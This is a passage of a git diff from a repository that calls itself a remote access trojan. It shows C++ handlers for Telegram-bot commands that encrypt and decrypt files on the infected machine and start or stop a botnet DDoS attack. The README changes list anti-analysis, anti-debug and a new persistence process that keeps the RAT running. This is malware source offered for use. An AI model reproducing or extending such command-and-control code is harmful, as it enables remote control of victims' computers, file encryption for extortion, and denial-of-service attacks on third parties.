not decrypted"); + } } } - - // FILE CRYPTOR - else if (params[0] == "filecrypt") { - if (FileCryptor::FileCrypt(params[1], params[2])) { - api.SendTextMessage(s.chatid, "Success! File crypted"); - } - else { - api.SendTextMessage(s.chatid, "Error! File not crypted. Maybe, file not found?"); - } + else if (last == "/online") { + api.SendTextMessage(s.chatid, information.c_str()); } - else if (params[0] == "filedecrypt") { - if (FileCryptor::FileDecrypt(params[1], params[2])) { - api.SendTextMessage(s.chatid, "Success! File decrypted"); + // 0 1 2 + // /botnet start/stop https://google.com + else if (last.substr(0, 7) == "/botnet") { + std::vector params = Manager::split(last, ' '); + if (params[1] == "start") { + botnet.Start((char*)params[1].c_str()); + std::string text = prefix + ": Started BotNet DDOS!"; + api.SendTextMessage(s.chatid, text.c_str()); } - else { - api.SendTextMessage(s.chatid, "Error! File not decrypted"); + else if (params[1] == "stop") { + botnet.Stop(); + std::string text = prefix + ": Stopped BotNet DDOS!"; + api.SendTextMessage(s.chatid, text.c_str()); } } } - else if (last == "/online") { - api.SendTextMessage(s.chatid, information.c_str()); - } - - // 0 1 2 - // /botnet start/stop https://google.com - else if (last.substr(0, 7) == "/botnet") { - std::vector params = Manager::split(last, ' '); - if (params[1] == "start") { - botnet.Start((char*)params[1].c_str()); - std::string text = prefix + ": Started BotNet DDOS!"; - api.SendTextMessage(s.chatid, text.c_str()); - } - else if (params[1] == "stop") { - botnet.Stop(); - std::string text = prefix + ": Stopped BotNet DDOS!"; - api.SendTextMessage(s.chatid, text.c_str()); - } - } } } diff --git a/README.md b/README.md index 037ad23..5dc4358 100644 --- a/README.md +++ b/README.md @@ -91,7 +91,7 @@ - [x] Add more information about PC - [x] Add Service manager (for deleting, showing and adding your system drivers) - [x] Add Anti-analysis + Anti-debug functions - +- [ ] Add mutual tracking between process-spy and RAT-process # [CHANGELOG]
View changelog @@ -111,6 +111,7 @@ Date | Time | Description 08.11.2020 | 20:25 | Added file cryptor. See command list ![1](https://github.com/4B4DB4B3/B4DB4B3-RAT/blob/main/Screenshots/FileCrypt/1.png) ![2](https://github.com/4B4DB4B3/B4DB4B3-RAT/blob/main/Screenshots/FileCrypt/2.png) ![3](https://github.com/4B4DB4B3/B4DB4B3-RAT/blob/main/Screenshots/FileCrypt/3.png) ![4](https://github.com/4B4DB4B3/B4DB4B3-RAT/blob/main/Screenshots/FileCrypt/4.png) 19.11.2020 | 20:20 | Code refactored. Fixed command "dir del_file". Added commands in File Manager: "dir read" and "dir write" to read and write files (see command list) ![dir_read](https://github.com/4B4DB4B3/B4DB4B3-RAT/blob/main/Screenshots/dir/dir_read.png) ![dir_write](https://github.com/4B4DB4B3/B4DB4B3-RAT/blob/main/Screenshots/dir/dir_write.png) 12.02.2021 | 23:30 | Fix crash in Anti-Analysis & Anti-Debug function +30.05.2021 | 13:21 | A process is started that makes sure that the RAT does not close
## Service manager parse table: diff --git a/Screenshots/NEWUI.png b/Screenshots/NEWUI.png index 7867e0a..1c8da92 100644 Binary files a/Screenshots/NEWUI.png and b/Screenshots/NEWUI.png differ